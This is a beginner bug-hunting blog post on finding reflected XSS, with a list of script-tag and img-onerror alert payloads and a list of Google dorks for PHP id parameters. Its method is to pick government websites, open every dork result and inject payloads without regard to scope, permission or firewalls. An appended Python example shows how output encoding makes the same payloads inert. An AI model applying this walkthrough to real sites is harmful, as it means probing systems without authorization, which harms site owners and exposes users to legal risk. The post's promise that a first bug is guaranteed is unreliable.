How to Find Your First Bug (For Beginners)

Mr.Horbio
3 min read · Nov 24, 2023

As a beginner, you try to find bugs on many websites but still find nothing, and you get demotivated during bug hunting. Don't worry, I am here to help.


When I began bug hunting, I was like you. I didn't find any bugs and got demotivated. But I still didn't give up hope. I stayed with it and practiced again and again, and finally got my first bug (XSS) and reported it.

I will give you all the methodology for bug hunting.

Note: This is a special methodology for newbies.

Follow these steps and find your first bug. I guarantee you will find your first bug.

Step 1: Find govt. websites for bug hunting, because most govt. websites are vulnerable, so it is helpful for you.

Step 2: Use Google dorks to find vulnerable parameters.

Some XSS payloads to test with:
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>

Step 3: Let's walk through a live example (finding XSS).

Step 4: Use these Google dorks to find vulnerable parameters for XSS.

These are the dorks for finding vulnerable parameters:
inurl:index.php?id=
inurl:product.php?id=
inurl:category.php?id=
inurl:article.php?id=
inurl:gallery.php?id=
inurl:page.php?id=
inurl:show.php?id=
inurl:detail.php?id=
inurl:view.php?id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:topic.php?ID=
inurl:forum.php?topic=
inurl:viewforum.php?id=
inurl:profile.php?id=
inurl:showthread.php?t=
inurl:member.php?action=profile&id=
inurl:productlist.php?id=
inurl:shop_category.php?id=
inurl:catalog.php?cat=

I will choose the first one for finding XSS:
inurl:index.php?id=

Step 5: Simply copy the dork, paste it into the browser and search.

Step 6: Open every link one by one, put in the payload and check for XSS (don't worry about firewalls or bypass techniques, simply put in the XSS payload and try to get a pop-up). Payload: "><script>alert('XSS')</script>

In the above screenshot I didn't find any XSS vuln., so I try the next one again and again until it shows a popup.

Step 7: After visiting a lot of websites I got my first bug.

Step 8: BOOM, guys! You got your first bug. Now you can report it on Open Bug Bounty.
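
Why the Step 6 payload produces a pop-up, and the output encoding that stops it, shown as an added example that is not from the original article. The page template and the helper names (render_vulnerable, render_hardened, active_content, audit) are constructed for illustration; the payloads come from the list above.

```python
import html
from html.parser import HTMLParser

# Constructed page: reflects the id parameter into a quoted attribute and body text.
TEMPLATE = '<form><input name="id" value="{id}"></form><p>Item: {id}</p>'
# Payloads taken from the article's list.
PAYLOADS = [
    '"><script>alert(\'XSS\')</script>',
    "<ScRiPt>alert(1)</sCriPt>",
    "<img src=xss onerror=alert(1)>",
    "<IMG SRC=javascript:alert('XSS')>",
]

def render_vulnerable(param):
    """Reflects the parameter verbatim, so markup in it is parsed as markup."""
    return TEMPLATE.format(id=param)

def render_hardened(param):
    """HTML-encodes & < > " ' so the parameter can only ever be text."""
    return TEMPLATE.format(id=html.escape(param, quote=True))

class ActiveContentFinder(HTMLParser):
    """Collects script elements, on* handlers and javascript: URLs."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in ("src", "href") and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name}")

def active_content(markup):
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings

def audit(render):
    """Maps each payload to the active content it produced in the rendered page."""
    return {p: active_content(render(p)) for p in PAYLOADS}

if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        for payload, found in audit(render).items():
            print(f"{label:10} {payload!r} -> {found or 'inert text'}")
```

html.escape covers the HTML body and quoted-attribute contexts used in this template; values placed inside script blocks or URLs need encoding for that context instead.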

For a practical video, visit here.

This channel will help you find your first bug.

Thanks for reading till the end. We will meet in the next article. Report this vulnerability on Open Bug Bounty.
